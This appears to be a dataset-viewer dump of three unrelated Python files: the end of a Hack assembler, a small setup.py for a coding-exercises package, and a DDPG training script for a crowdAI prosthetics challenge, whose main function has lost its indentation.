    Lines that are entirely a comment are removed; trailing comments are
    cut off, keeping the code (and its original leading whitespace)
    before the marker.
    """
    ret = []
    for l in contents:
        if l.strip().startswith('//'):
            continue
        # Index into the original line, not the stripped copy: the
        # original code took the index from the stripped string and
        # applied it to the unstripped line, truncating indented code.
        if (com := l.find('//')) != -1:
            ret.append(l[:com])
            continue
        ret.append(l)
    return ret
class AIns:
    """An A-instruction (@value or @symbol) of the Hack machine language."""

    def __init__(self, token, symbols):
        """Resolve *token* to a 15-bit address, registering new symbols."""
        # Numeric literals are used directly; anything else is looked up
        # in (or newly added to) the symbol table.
        if token.isdecimal():
            self.value = int(token)
            if self.value > 2 ** 15 - 1:
                raise ParseError("A instruction value is too high")
        else:
            if token not in symbols.symbols:
                symbols.add(token)
            self.value = symbols.symbols[token]

    def get_binary(self):
        """Return the 16-bit encoding: a leading 0 bit plus a 15-bit value."""
        return "0{:015b}".format(self.value)
class CIns:
    """A C-instruction (dest=comp;jump) of the Hack machine language."""

    # comp mnemonic -> 6-bit ALU control field (c1..c6).  M-mnemonics
    # share an encoding with their A counterpart; the a-bit chosen in
    # get_binary selects between the A and M inputs.
    comp = {
        '0': '101010',
        '1': '111111',
        '-1': '111010',
        'D': '001100',
        'A': '110000',
        'M': '110000',
        '!D': '001101',
        '!A': '110001',
        '!M': '110001',
        '-D': '001111',
        '-A': '110011',
        '-M': '110011',
        'D+1': '011111',
        'A+1': '110111',
        'M+1': '110111',
        'D-1': '001110',
        'A-1': '110010',
        'M-1': '110010',
        'D+A': '000010',
        'D+M': '000010',
        'D-A': '010011',
        'D-M': '010011',
        'A-D': '000111',
        'M-D': '000111',
        'D&A': '000000',
        'D&M': '000000',
        'D|A': '010101',
        'D|M': '010101',
    }
    # jump mnemonic -> 3-bit jump field (j1..j3); '000' means no jump.
    jmp = {
        'JGT': '001',
        'JEQ': '010',
        'JGE': '011',
        'JLT': '100',
        'JNE': '101',
        'JLE': '110',
        'JMP': '111',
    }
    def __init__(self, token):
        """Split a C-instruction string into its dest, comp and jump parts."""
        self.raw_instruction = token
        token = token.replace(' ', '')
        self.dest = ''
        self.comp = ''
        self.jmp = ''
        # Grammar: [dest=]comp[;jump] -- both dest and jump are optional.
        if '=' in token:
            self.dest, token = token.split('=', 1)
        if ';' in token:
            self.comp, self.jmp = token.split(';', 1)
        else:
            self.comp = token
    def get_binary(self):
        """Return the 16-bit encoding: 111 a c1-c6 d1-d3 j1-j3."""
        head = '111'
        a='0'
        comp = '000000'
        dst = ['0', '0', '0']
        jmp = '000'
        if self.dest:
            if len(self.dest) > 3:
                raise ParseError('Wrong dest length')
            # Destination bits: d1=A, d2=D, d3=M (any combination).
            if 'A' in self.dest:
                dst[0] = '1'
            if 'D' in self.dest:
                dst[1] = '1'
            if 'M' in self.dest:
                dst[2] = '1'
        if self.jmp:
            try:
                jmp = CIns.jmp[self.jmp]
            except KeyError:
                raise ParseError('Wrong jmp instruction')
        try:
            comp = CIns.comp[self.comp]
        except KeyError:
            raise ParseError("Wrong comp instruction")
        # The a-bit selects the M register instead of A as ALU input.
        if 'M' in self.comp:
            a = '1'
        ret = "{}{}{}{}{}".format(head, a, comp, ''.join(dst), jmp)
        if len(ret) > 16:
            raise ParseError("CInstruction binary contruction error, command was '{}'".format(self.raw_instruction))
        return ret
def parse(contents, symbols):
    """Translate cleaned source lines into AIns/CIns instruction objects."""
    instructions = []
    for line in contents:
        stripped = line.strip()
        if stripped.startswith('@'):
            instructions.append(AIns(stripped[1:], symbols))
        else:
            instructions.append(CIns(stripped))
    return instructions
class Symbols:
    """Symbol table for the Hack assembler.

    Pre-populated with the predefined registers and pointers; new
    variables are allocated consecutive RAM addresses starting at 16.
    """

    def __init__(self):
        self.memptr = 16  # next free RAM address for variables
        # Registers R0..R15 map to RAM addresses 0..15.
        self.symbols = {'R{}'.format(i): i for i in range(16)}
        self.symbols.update({
            'SCREEN': 16384,
            'KBD': 24576,
            'SP': 0,
            'LCL': 1,
            'ARG': 2,
            'THIS': 3,
            'THAT': 4,
        })

    def fill_with_labels(self, contents):
        """Record (LABEL) pseudo-instructions; return the lines without them.

        A label maps to the address of the next real instruction.
        """
        remaining = []
        pos = 0  # ROM address of the next emitted instruction
        for line in contents:
            stripped = line.strip()
            if stripped.startswith('(') and stripped.endswith(')'):
                label = stripped[1:-1]
                if label in self.symbols:
                    raise ParseError('Label redefinition')
                self.symbols[label] = pos
            else:
                remaining.append(line)
                pos += 1
        return remaining

    def add(self, symbol):
        """Allocate the next free RAM address for a new variable *symbol*."""
        if symbol in self.symbols:
            raise ParseError('Variable redefinition')
        self.symbols[symbol] = self.memptr
        self.memptr += 1
def main():
    """Assemble the .asm file named on the command line into a .hack file."""
    # Fixed: the original tested `len(sys.argv) < 1`, which is never true
    # (argv always contains the program name), so a missing argument
    # crashed with IndexError instead of exiting cleanly.
    if len(sys.argv) < 2:
        exit(1)
    filename = sys.argv[1]
    # Two cleaning passes: block comments first, then line comments.
    with open(filename) as f:
        text = f.read()
    contents = remove_inline_comments(text).split('\n')
    contents = filter(None, remove_comments(contents))
    # First pass resolves labels, second pass builds the instructions.
    symbols = Symbols()
    contents = symbols.fill_with_labels(contents)
    parsed = parse(contents, symbols)
    out_filename = "{}.hack".format(os.path.splitext(filename)[0])
    with open(out_filename, 'w') as f:
        for i in parsed:
            try:
                f.write("{}\n".format(i.get_binary()))
            except ParseError as e:
                print(e)
                exit(1)

if __name__ == "__main__":
    main()
|
8,098 | 5f4abc7e9397034737ee214b0d0aae39ebf1548b | #!/usr/bin/env python
# pylama:ignore=E221,E251
from setuptools import find_packages, setup
# Packaging metadata; the aligned `=` style is exempted from linting by
# the pylama pragma at the top of the file.
setup(
    name = 'coding_exercises',
    version = '1.0',
    description = 'Coding Exercises in Python',
    author = 'Gustavo Gama',
    author_email = 'gustavo.gama@gmail.com',
    url = 'https://gama.igenesis.com.br',
    packages = find_packages()
)
|
8,099 | 3f92bf194058c97a40cd5728cfc7c9d1be6b2548 | import os
import sys
import time
from collections import deque
import pickle
import random
import string
from tensorflow.python.framework.errors import InvalidArgumentError
from baselines.ddpg.ddpg import DDPG
import baselines.common.tf_util as U
from baselines.ddpg import prosthetics_env
from baselines import logger
import numpy as np
import tensorflow as tf
# https://bitbucket.org/mpi4py/mpi4py/issues/54/example-mpi4py-code-not-working
import mpi4py
mpi4py.rc.recv_mprobe = False
from mpi4py import MPI
import pickle
from pdb import set_trace
import pathlib
import resource
NB_EVAL_EPOCHS=1
NB_EVAL_EPOCH_CYCLES=0
NB_EVAL_STEPS=1001
def train(env, nb_epochs, nb_epoch_cycles, render_eval, reward_scale, render, param_noise, actor, critic,
normalize_returns, normalize_observations, critic_l2_reg, actor_lr, critic_lr, action_noise,
popart, gamma, clip_norm, nb_train_steps, nb_rollout_steps, nb_eval_steps, batch_size, memory,
saved_model_basename, restore_model_name, crowdai_client, crowdai_token,
reward_shaping, feature_embellishment, relative_x_pos, relative_z_pos,
tau=0.01, eval_env=None, param_noise_adaption_interval=50):
rank = MPI.COMM_WORLD.Get_rank()
assert (np.abs(env.action_space.low) == env.action_space.high).all() # we assume symmetric actions.
max_action = env.action_space.high
logger.info('scaling actions by {} before executing in env'.format(max_action))
agent = DDPG(actor, critic, memory, env.observation_space.shape, env.action_space.shape,
gamma=gamma, tau=tau, normalize_returns=normalize_returns, normalize_observations=normalize_observations,
batch_size=batch_size, action_noise=action_noise, param_noise=param_noise, critic_l2_reg=critic_l2_reg,
actor_lr=actor_lr, critic_lr=critic_lr, enable_popart=popart, clip_norm=clip_norm,
reward_scale=reward_scale)
logger.info('Using agent with the following configuration:')
logger.info(str(agent.__dict__.items()))
# Set up logging stuff only for a single worker.
saved_model_dir = 'saved-models/'
if saved_model_basename is None:
saved_model_basename = ''.join(random.choices(string.ascii_lowercase + string.digits, k=8))
saved_model_path = saved_model_dir + saved_model_basename
if restore_model_name:
restore_model_path = restore_model_name
if not pathlib.Path(restore_model_path+'.index').is_file():
restore_model_path = saved_model_dir + restore_model_name
max_to_keep = 500
eval_reward_threshold_to_keep = 300
saver = tf.train.Saver(max_to_keep=max_to_keep)
adam_optimizer_store = dict()
adam_optimizer_store['actor_optimizer'] = dict()
adam_optimizer_store['critic_optimizer'] = dict()
#eval_episode_rewards_history = deque(maxlen=100)
#episode_rewards_history = deque(maxlen=100)
with U.single_threaded_session() as sess:
try:
if restore_model_name:
logger.info("Restoring from model at", restore_model_path)
#saver.restore(sess, tf.train.latest_checkpoint(model_path))
saver.restore(sess, restore_model_path)
else:
logger.info("Creating new model")
sess.run(tf.global_variables_initializer()) # this should happen here and not in the agent right?
except InvalidArgumentError as exc:
if "Assign requires shapes of both tensors to match." in str(exc):
print("Unable to restore model from {:s}.".format(restore_model_path))
print("Chances are you're trying to restore a model with reward embellishment into an environment without reward embellishment (or vice versa). Unfortunately this isn't supported (yet).")
print(exc.message)
sys.exit()
else:
raise exc
# Prepare everything.
agent.initialize(sess)
sess.graph.finalize()
agent.reset()
# restore adam optimizer
try:
if restore_model_name:
logger.info("Restoring pkl file with adam state", restore_model_path)
#saver.restore(sess, tf.train.latest_checkpoint(model_path))
adam_optimizer_store = pickle.load(open(restore_model_path
+ ".pkl", "rb"))
agent.actor_optimizer.m = adam_optimizer_store['actor_optimizer']['m']
agent.actor_optimizer.v = adam_optimizer_store['actor_optimizer']['v']
agent.actor_optimizer.t = adam_optimizer_store['actor_optimizer']['t']
agent.critic_optimizer.m = adam_optimizer_store['critic_optimizer']['m']
agent.critic_optimizer.v = adam_optimizer_store['critic_optimizer']['v']
agent.critic_optimizer.t = adam_optimizer_store['critic_optimizer']['t']
if 'param_noise' in adam_optimizer_store:
agent.param_noise = adam_optimizer_store['param_noise']
except:
print("Unable to restore adam state from {:s}.".format(restore_model_path))
obs = env.reset()
done = False
episode_reward = 0.
#episode_step = 0
#episodes = 0
#t = 0
#epoch_episode_steps = []
#epoch_episode_eval_rewards = []
#epoch_episode_eval_steps = []
#epoch_start_time = time.time()
#epoch_actions = []
#epoch_episodes = 0
for epoch in range(nb_epochs):
start_time = time.time()
epoch_episode_rewards = []
epoch_qs = []
eval_episode_rewards = []
eval_qs = []
eval_steps = []
epoch_actor_losses = []
epoch_critic_losses = []
worth_keeping = False
for cycle in range(nb_epoch_cycles):
# Perform rollouts.
for t_rollout in range(nb_rollout_steps):
# Predict next action.
action, q = agent.pi(obs, apply_noise=True, compute_Q=True)
assert action.shape == env.action_space.shape
# Execute next action.
if rank == 0 and render:
env.render()
assert max_action.shape == action.shape
#new_obs, r, done, info = env.step(max_action * action) # scale for execution in env (as far as DDPG is concerned, every action is in [-1, 1])
new_obs, r, done, info = env.step(action)
#t += 1
if rank == 0 and render:
env.render()
episode_reward += r
#episode_step += 1
# Book-keeping.
#epoch_actions.append(action)
epoch_qs.append(q)
agent.store_transition(obs, action, r, new_obs, done)
obs = new_obs
if done:
# Episode done.
epoch_episode_rewards.append(episode_reward)
#episode_rewards_history.append(episode_reward)
#epoch_episode_steps.append(episode_step)
episode_reward = 0.
#episode_step = 0
#epoch_episodes += 1
#episodes += 1
agent.reset()
obs = env.reset()
# Train.
#epoch_adaptive_distances = []
for t_train in range(nb_train_steps):
# Adapt param noise, if necessary.
if memory.nb_entries >= batch_size and t_train % param_noise_adaption_interval == 0:
distance = agent.adapt_param_noise()
#epoch_adaptive_distances.append(distance)
cl, al = agent.train()
epoch_critic_losses.append(cl)
epoch_actor_losses.append(al)
agent.update_target_net()
# Submit to crowdai competition. What a hack. :)
#if crowdai_client is not None and crowdai_token is not None and eval_env is not None:
crowdai_submit_count = 0
if crowdai_client is not None and crowdai_token is not None:
eval_obs_dict = crowdai_client.env_create(crowdai_token, env_id="ProstheticsEnv")
eval_obs_dict, eval_obs_projection = prosthetics_env.transform_observation(
eval_obs_dict,
reward_shaping=reward_shaping,
reward_shaping_x=1.,
feature_embellishment=feature_embellishment,
relative_x_pos=relative_x_pos,
relative_z_pos=relative_z_pos)
while True:
action, _ = agent.pi(eval_obs_projection, apply_noise=False, compute_Q=False)
submit_action = prosthetics_env.openai_to_crowdai_submit_action(action)
clipped_submit_action = np.clip(submit_action, 0., 1.)
actions_equal = clipped_submit_action == submit_action
if not np.all(actions_equal):
logger.debug("crowdai_submit_count:", crowdai_submit_count)
logger.debug(" openai-action:", action)
logger.debug(" submit-action:", submit_action)
crowdai_submit_count += 1
[eval_obs_dict, reward, done, info] = crowdai_client.env_step(clipped_submit_action.tolist(), True)
#[eval_obs_dict, reward, done, info] = crowdai_client.env_step(agent.pi(eval_obs_projection, apply_noise=False, compute_Q=False), True)
eval_obs_dict, eval_obs_projection = prosthetics_env.transform_observation(
eval_obs_dict,
reward_shaping=reward_shaping,
reward_shaping_x=1.,
feature_embellishment=feature_embellishment,
relative_x_pos=relative_x_pos,
relative_z_pos=relative_z_pos)
if done:
logger.debug("done: crowdai_submit_count:", crowdai_submit_count)
eval_obs_dict = crowdai_client.env_reset()
if not eval_obs_dict:
break
logger.debug("done: eval_obs_dict exists after reset")
eval_obs_dict, eval_obs_projection = prosthetics_env.transform_observation(
eval_obs_dict,
reward_shaping=reward_shaping,
reward_shaping_x=1.,
feature_embellishment=feature_embellishment,
relative_x_pos=relative_x_pos,
relative_z_pos=relative_z_pos)
crowdai_client.submit()
return # kids, don't try any of these (expedient hacks) at home!
if eval_env:
eval_episode_reward_mean, eval_q_mean, eval_step_mean = evaluate_n_episodes(3, eval_env, agent, nb_eval_steps, render_eval)
if eval_episode_reward_mean >= eval_reward_threshold_to_keep:
worth_keeping = True
mpi_size = MPI.COMM_WORLD.Get_size()
# Log stats.
# XXX shouldn't call np.mean on variable length lists
duration = time.time() - start_time
if nb_epochs and nb_epoch_cycles and nb_train_steps > 0:
#stats = agent.get_stats()
#combined_stats = stats.copy()
combined_stats = {}
combined_stats['train/epoch_episode_reward_mean'] = np.mean(epoch_episode_rewards)
#combined_stats['rollout/return_history'] = np.mean(episode_rewards_history)
#combined_stats['rollout/episode_steps'] = np.mean(epoch_episode_steps)
#combined_stats['rollout/actions_mean'] = np.mean(epoch_actions)
combined_stats['train/epoch_Q_mean'] = np.mean(epoch_qs)
combined_stats['train/epoch_loss_actor'] = np.mean(epoch_actor_losses)
combined_stats['train/epoch_loss_critic'] = np.mean(epoch_critic_losses)
#combined_stats['train/param_noise_distance'] = np.mean(epoch_adaptive_distances)
combined_stats['train/epoch_duration'] = duration
#combined_stats['epoch/steps_per_second'] = float(t) / float(duration)
#combined_stats['total/episodes'] = episodes
#combined_stats['rollout/episodes'] = epoch_episodes
#combined_stats['rollout/actions_std'] = np.std(epoch_actions)
#combined_stats['memory/rss'] = resource.getrusage(resource.RUSAGE_SELF).ru_maxrss
else:
combined_stats = {}
# Evaluation statistics.
if eval_env:
combined_stats['eval/epoch_episode_reward_mean'] = eval_episode_reward_mean # np.mean(eval_episode_rewards)
#combined_stats['eval/return_history'] = np.mean(eval_episode_rewards_history)
#combined_stats['eval/epoch_episode_reward_std'] = np.std(eval_episode_rewards)
combined_stats['eval/epoch_Q_mean'] = eval_q_mean # np.mean(eval_qs)
#combined_stats['eval/episodes'] = len(eval_episode_rewards)
combined_stats['eval/steps_mean'] = eval_step_mean # np.mean(eval_steps)
def as_scalar(x):
if isinstance(x, np.ndarray):
assert x.size == 1
return x[0]
elif np.isscalar(x):
return x
else:
raise ValueError('expected scalar, got %s'%x)
combined_stats_sums = MPI.COMM_WORLD.allreduce(np.array([as_scalar(x) for x in combined_stats.values()]))
combined_stats = {k : v / mpi_size for (k,v) in zip(combined_stats.keys(), combined_stats_sums)}
# Total statistics.
#combined_stats['total/epochs'] = epoch + 1
#combined_stats['total/steps'] = t
for key in sorted(combined_stats.keys()):
logger.record_tabular(key, combined_stats[key])
logger.info('')
logger.info('Epoch', epoch)
logger.dump_tabular()
logdir = logger.get_dir()
if worth_keeping and rank == 0 and nb_epochs and nb_epoch_cycles and nb_train_steps and nb_rollout_steps:
logger.info('Saving model to', saved_model_dir + saved_model_basename + '-' + str(epoch))
saver.save(sess, saved_model_path, global_step=epoch, write_meta_graph=False)
adam_optimizer_store['actor_optimizer']['m'] = agent.actor_optimizer.m
adam_optimizer_store['actor_optimizer']['v'] = agent.actor_optimizer.v
adam_optimizer_store['actor_optimizer']['t'] = agent.actor_optimizer.t
adam_optimizer_store['critic_optimizer']['m'] = agent.critic_optimizer.m
adam_optimizer_store['critic_optimizer']['v'] = agent.critic_optimizer.v
adam_optimizer_store['critic_optimizer']['t'] = agent.critic_optimizer.t
adam_optimizer_store['param_noise'] = agent.param_noise
pickle.dump(adam_optimizer_store, open((saved_model_path +
"-" + str(epoch) +
".pkl"), "wb"))
old_epoch = epoch - max_to_keep
if old_epoch >= 0:
try:
os.remove(saved_model_path + "-" + str(old_epoch)
+ ".pkl")
except OSError:
pass
if rank == 0 and logdir:
if hasattr(env, 'get_state'):
with open(os.path.join(logdir, 'env_state.pkl'), 'wb') as f:
pickle.dump(env.get_state(), f)
if eval_env and hasattr(eval_env, 'get_state'):
with open(os.path.join(logdir, 'eval_env_state.pkl'), 'wb') as f:
pickle.dump(eval_env.get_state(), f)
def evaluate_n_episodes(n, eval_env, agent, nb_eval_steps, render):
    """Run *n* evaluation episodes and aggregate their statistics.

    Returns (mean reward, step-weighted mean Q, mean episode length).
    """
    outcomes = [evaluate_one_episode(eval_env, agent, nb_eval_steps, render)
                for _ in range(n)]
    rewards = [reward for reward, _, _ in outcomes]
    q_means = [q for _, q, _ in outcomes]
    steps = [length for _, _, length in outcomes]
    # Q means are weighted by episode length so short episodes don't
    # dominate the average.
    return np.mean(rewards), np.average(q_means, weights=steps), np.mean(steps)
def evaluate_one_episode(env, agent, nb_eval_steps, render):
    """Run a single greedy (noise-free) evaluation episode.

    Steps *env* for at most *nb_eval_steps* steps, stopping early when
    the episode reports done.

    Returns:
        (total reward, mean Q estimate, number of steps executed)

    Raises:
        ValueError: if nb_eval_steps is not positive.  The original only
        logged an error and then crashed on an unbound loop variable.
    """
    if nb_eval_steps <= 0:
        raise ValueError('evaluate_one_episode nb_eval_steps must be > 0')
    reward = 0.
    qs = []
    obs = env.reset()
    for step in range(nb_eval_steps):
        action, q = agent.pi(obs, apply_noise=False, compute_Q=True)
        obs, r, done, info = env.step(action)
        if render:
            env.render()
        reward += r
        qs.append(q)
        if done:
            # Stop at episode end rather than averaging several episodes
            # (the upstream baselines code kept looping here).
            break
    # NOTE: the original also had an `elif step >= nb_eval_steps` branch,
    # which is unreachable inside `range(nb_eval_steps)` and was removed.
    return reward, np.mean(qs), step + 1
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.